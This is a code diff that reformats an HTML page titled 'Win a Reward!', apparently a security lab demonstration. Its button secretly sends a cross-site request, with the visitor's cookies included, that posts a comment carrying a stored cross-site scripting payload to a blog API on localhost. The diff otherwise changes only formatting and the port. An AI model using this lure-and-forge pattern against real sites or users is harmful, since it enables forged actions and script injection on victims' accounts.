--- a/tools/price-win.html
+++ b/tools/price-win.html
@@ -1,111 +1,121 @@
-<!DOCTYPE html>
+<!doctype html>
 <html lang="en">
-<head>
-    <meta charset="UTF-8">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <head>
+    <meta charset="UTF-8" />
+    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
     <title>Win a Reward!</title>
     <style>
-        body {
-            margin: 0;
-            padding: 0;
-            font-family: 'Arial', sans-serif;
-            background: linear-gradient(135deg, #6a11cb, #2575fc);
-            display: flex;
-            justify-content: center;
-            align-items: center;
-            height: 100vh;
-            color: white;
-            text-align: center;
-        }
+      body {
+        margin: 0;
+        padding: 0;
+        font-family: "Arial", sans-serif;
+        background: linear-gradient(135deg, #6a11cb, #2575fc);
+        display: flex;
+        justify-content: center;
+        align-items: center;
+        height: 100vh;
+        color: white;
+        text-align: center;
+      }
 
-        .container {
-            background: rgba(255, 255, 255, 0.1);
-            padding: 40px;
-            border-radius: 15px;
-            box-shadow: 0 10px 30px rgba(0, 0, 0, 0.2);
-            backdrop-filter: blur(10px);
-            max-width: 400px;
-            width: 100%;
-        }
+      .container {
+        background: rgba(255, 255, 255, 0.1);
+        padding: 40px;
+        border-radius: 15px;
+        box-shadow: 0 10px 30px rgba(0, 0, 0, 0.2);
+        backdrop-filter: blur(10px);
+        max-width: 400px;
+        width: 100%;
+      }
 
-        h1 {
-            font-size: 2.5rem;
-            margin-bottom: 20px;
-        }
+      h1 {
+        font-size: 2.5rem;
+        margin-bottom: 20px;
+      }
 
-        p {
-            font-size: 1.2rem;
-            margin-bottom: 30px;
-        }
+      p {
+        font-size: 1.2rem;
+        margin-bottom: 30px;
+      }
 
-        .btn {
-            background: #ff6f61;
-            color: white;
-            padding: 15px 30px;
-            font-size: 1.2rem;
-            border: none;
-            border-radius: 50px;
-            cursor: pointer;
-            transition: background 0.3s ease;
-        }
+      .btn {
+        background: #ff6f61;
+        color: white;
+        padding: 15px 30px;
+        font-size: 1.2rem;
+        border: none;
+        border-radius: 50px;
+        cursor: pointer;
+        transition: background 0.3s ease;
+      }
 
-        .btn:hover {
-            background: #ff3b2f;
-        }
+      .btn:hover {
+        background: #ff3b2f;
+      }
 
-        .btn:active {
-            transform: scale(0.95);
-        }
+      .btn:active {
+        transform: scale(0.95);
+      }
 
-        .btn:disabled {
-            pointer-events: none;
-        }
+      .btn:disabled {
+        pointer-events: none;
+      }
     </style>
     <script type="text/javascript">
-        function uploadComment(event) {
-            event.preventDefault()
-            const inputs = document.getElementsByTagName('INPUT')
-            inputs[0].setAttribute('disabled', 'disabled')
-            console.log(inputs[0])
-            const postId = 2
-            const userId = 2
-            const newUserComment = {
-                postId: postId,
-                userId: userId,
-                comment: "<script>alert('You have been hacked')<\/script>",
-            };
-            console.log("Sending data:", '/posts/' + postId + '/comments', JSON.stringify(newUserComment));
-            fetch('http://localhost:8080/api/posts/' + postId + '/comments', {
-                method: 'POST',
-                headers: {
-                    "Content-Type": "application/json"
-                },
-                credentials: 'include',
-                body: JSON.stringify(newUserComment),
-            })
-                .then(response => {
-                    if (!response.ok) {
-                        console.error("did not succeeded", response)
-                        return
-                    }
-                    alert("comment added")
-                })
-                .catch(error => {
-                    console.error('There has been a problem with your fetch operation:', error);
-                }).finally(() => {
-                    inputs[0].removeAttribute('disabled', 'disabled')
-            });
-        }
+      function uploadComment(event) {
+        event.preventDefault();
+        const inputs = document.getElementsByTagName("INPUT");
+        inputs[0].setAttribute("disabled", "disabled");
+        console.log(inputs[0]);
+        const postId = 2;
+        const userId = 2;
+        const newUserComment = {
+          postId: postId,
+          userId: userId,
+          comment: "<script>alert('You have been hacked')<\/script>",
+        };
+        console.log(
+          "Sending data:",
+          "/posts/" + postId + "/comments",
+          JSON.stringify(newUserComment),
+        );
+        fetch("http://localhost:8083/api/posts/" + postId + "/comments", {
+          method: "POST",
+          headers: {
+            "Content-Type": "application/json",
+          },
+          credentials: "include",
+          body: JSON.stringify(newUserComment),
+        })
+          .then((response) => {
+            if (!response.ok) {
+              console.error("did not succeeded", response);
+              return;
+            }
+            alert("comment added");
+          })
+          .catch((error) => {
+            console.error(
+              "There has been a problem with your fetch operation:",
+              error,
+            );
+          })
+          .finally(() => {
+            inputs[0].removeAttribute("disabled", "disabled");
+          });
+      }
     </script>
-</head>
-<body>
-<div class="container">
-    <h1>Win a Reward!</h1>
-    <p>Click the button below to claim your surprise reward. Don't wait, it's just a click away!</p>
-    <form onsubmit="uploadComment(event)">
-        <input type="submit" class="btn" value="Click Here"/>
-    </form>
-
-</div>
-</body>
+  </head>
+  <body>
+    <div class="container">
+      <h1>Win a Reward!</h1>
+      <p>
+        Click the button below to claim your surprise reward. Don't wait, it's
+        just a click away!
+      </p>
+      <form onsubmit="uploadComment(event)">
+        <input type="submit" class="btn" value="Click Here" />
+      </form>
+    </div>
+  </body>
 </html>
